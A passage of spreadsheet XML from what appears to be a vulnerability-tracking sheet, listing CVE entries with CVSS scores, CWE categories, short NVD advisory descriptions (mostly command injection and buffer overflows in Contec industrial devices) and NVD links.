        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>Pocketbase is an open source web backend written in go. Prior to 0.22.48 and 0.39.7, PocketBase's panic-recovery middleware covers regular request handling but not internal child and worker goroutines. A panic in one of these internal goroutines can escape recovery and terminate the server process, causing a denial of service. The remediation introduces routine.SafeWrap to convert recovered panics into regular errors and applies it to the affected internal worker functions. This issue is fixed in versions 0.22.48 and 0.39.7.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82410</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82762</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in Contec FX5000 series, FX4000 series, and FX3000 series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82762</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82766</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in SGA1000. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82766</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82770</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow vulnerability exists in Contec RP-WAH-SR Series. If a remote attacker sends a specially crafted request to the product's web service, an arbitrary program may be executed.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82770</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82772</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow vulnerability exists in Contec EC1000 series. If a remote attacker sends a specially crafted request to the product's web service, an arbitrary program may be executed.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82772</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82774</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in CONPROSYS M2M Gateway Series and CONPROSYS M2M Controller Series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82774</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82777</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in CONPROSYS PAC Series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82777</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82779</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in CONPROSYS TM Series. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82779</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82780</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>Unrestricted upload of file with dangerous type issue exists in CONPROSYS TM Series. If a specially crafted file is uploaded by a remote authenticated attacker, an arbitrary command may be executed on the product.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82780</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82787</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability exists in CPSL-08P1EN. If this vulnerability is exploited, an affected product may be operated by a remote attacker without authentication.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82787</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82789</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>An improper neutralization of directives in dynamically evaluated code ('Eval Injection') issue exists in CONPROSYS HMI System(CHS). If exploited, arbitrary code may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82789</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82791</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in Contec CAN 2.0B Communication Wireless LAN / USB Converter Unit. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82791</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82794</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>SolarView Compact contains an OS command Injection vulnerability in in Schedule Settings. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82794</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84408</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>QND contains an improper access control vulnerability in a named pipe, which may allow a local attacker who is logged in to a Windows PC where the affected product's client is installed to execute arbitrary commands with SYSTEM privileges.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84408</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85617</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.6.3 contain an authorization bypass vulnerability in the bulk delete functionality that allows restricted users to soft-delete users outside their authorized scope. Attackers can include unauthorized user IDs in bulk delete requests to bypass instance-level restrictions and modify or disable accounts they should not access.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85617</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86106</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated actor with network access to the private HA interconnect may trigger sensitive HA peer functions without verification. This could result in elevated command execution on Edge units where HA is enabled.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86106</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86831</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>Improper validation of pod identifier uniqueness in aws-network-policy-agent in Amazon EKS Network Policy Agent before v1.4.0 might allow an authenticated remote user to bypass NetworkPolicy enforcement on co-located pods in other namespaces via crafted pod and namespace names that produce pod identifier collisions.
To remediate this issue, users should upgrade to Amazon EKS Network Policy Agent 1.4.0 or later and Amazon VPC CNI Managed Add-on v1.22.4 or later (which includes Network Policy Agent v1.4.0).</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86831</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
